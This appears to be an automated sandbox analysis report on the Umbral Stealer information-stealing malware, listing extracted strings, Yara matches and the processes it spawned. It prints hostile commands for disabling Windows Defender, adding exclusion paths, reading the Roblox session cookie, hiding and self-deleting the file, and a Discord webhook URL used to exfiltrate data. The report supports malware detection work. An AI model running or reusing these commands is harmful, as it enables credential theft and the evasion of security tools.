                        Source: kaS9T.scr.0.drString found in binary or memory: https://discord.com/api/v10/users/
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drString found in binary or memory: https://discordapp.com/api/v9/users/
                        Source: kaS9T.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: powershell.exe, 00000017.00000002.2119777600.000002491F882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.m
                        Source: powershell.exe, 00000017.00000002.2287696510.0000024937C3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsof
                        Source: powershell.exe, 00000008.00000002.1792975353.00000113FEC8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.cogDy
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: zamPeEkHWr.exe, kaS9T.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: powershell.exe, 00000005.00000002.1757050367.000001D310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4F48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1894278502.000001BED4E05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1817451274.000001BEC674A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2036403659.000001DE69767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AE7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F6CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.000002492100A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2266136040.000002492F805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000A.00000002.1817451274.000001BEC658C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1925975234.000001DE5AD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2119777600.0000024920AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB066C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB07B7000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB02F1000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ptb.discord.com/api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.4:49740 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: zamPeEkHWr.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8C21500_2_00007FFD9B8C2150
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8C20D80_2_00007FFD9B8C20D8
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B88B8350_2_00007FFD9B88B835
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B88A3A00_2_00007FFD9B88A3A0
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3C3910_2_00007FFD9BA3C391
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3E3770_2_00007FFD9BA3E377
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA403000_2_00007FFD9BA40300
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3300D0_2_00007FFD9BA3300D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA467E10_2_00007FFD9BA467E1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA406460_2_00007FFD9BA40646
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA33D610_2_00007FFD9BA33D61
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4356A0_2_00007FFD9BA4356A
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3DCF20_2_00007FFD9BA3DCF2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA33D4D0_2_00007FFD9BA33D4D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA45C810_2_00007FFD9BA45C81
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA403C00_2_00007FFD9BA403C0
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA423170_2_00007FFD9BA42317
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA452F20_2_00007FFD9BA452F2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3628E0_2_00007FFD9BA3628E
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4A29D0_2_00007FFD9BA4A29D
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA332000_2_00007FFD9BA33200
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA332580_2_00007FFD9BA33258
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA451750_2_00007FFD9BA45175
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA328D50_2_00007FFD9BA328D5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA367C50_2_00007FFD9BA367C5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA326950_2_00007FFD9BA32695
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA305F50_2_00007FFD9BA305F5
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA40E520_2_00007FFD9BA40E52
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3A62F0_2_00007FFD9BA3A62F
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA3BE320_2_00007FFD9BA3BE32
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA4A4FA0_2_00007FFD9BA4A4FA
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9BA424FA0_2_00007FFD9BA424FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9630E95_2_00007FFD9B9630E9
                        Source: zamPeEkHWr.exe, 00000000.00000000.1668698301.000001EAAE5AC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs zamPeEkHWr.exe
                        Source: zamPeEkHWr.exeBinary or memory string: OriginalFilename vs zamPeEkHWr.exe
                        Source: zamPeEkHWr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: zamPeEkHWr.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.zamPeEkHWr.exe.1eaae570000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: zamPeEkHWr.exe, ----.csBase64 encoded string: 'h2lD2M3Hil/M+G/i8Tdt1a/5V858USNKJQJotLljPaZwLNm7Aplo/Hwtz1srHmnrQ2BERt7FjnGuNt7uzZsYULUA8sD3ubBYy39OXFgV6IMOKfqyulJwnxP0pPjd9gk8BpmeKeHdYfl5lqmGWM7d4DH7mm3Btx2fyaKkfJ7364ucXLsEQbbw0CozPsS3'
                        Source: zamPeEkHWr.exe, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: kaS9T.scr.0.dr, ----.csBase64 encoded string: 'h2lD2M3Hil/M+G/i8Tdt1a/5V858USNKJQJotLljPaZwLNm7Aplo/Hwtz1srHmnrQ2BERt7FjnGuNt7uzZsYULUA8sD3ubBYy39OXFgV6IMOKfqyulJwnxP0pPjd9gk8BpmeKeHdYfl5lqmGWM7d4DH7mm3Btx2fyaKkfJ7364ucXLsEQbbw0CozPsS3'
                        Source: kaS9T.scr.0.dr, -----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: kaS9T.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: kaS9T.scr.0.dr, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: zamPeEkHWr.exe, -----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: zamPeEkHWr.exe, -----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@40/23@3/2
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zamPeEkHWr.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeMutant created: \Sessions\1\BaseNamedObjects\PIYchE5GS1Ee0FryJ8gN
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\Users\user\AppData\Local\Temp\9mnNSrbpbgmC2ptJump to behavior
                        Source: zamPeEkHWr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zamPeEkHWr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: zamPeEkHWr.exe, 00000000.00000002.2336242686.000001EAB065D000.00000004.00000800.00020000.00000000.sdmp, zamPeEkHWr.exe, 00000000.00000002.2378470503.000001EAC8C43000.00000004.00000020.00020000.00000000.sdmp, ArtZhN3x4FUP6qs.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zamPeEkHWr.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile read: C:\Users\user\Desktop\zamPeEkHWr.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\zamPeEkHWr.exe "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
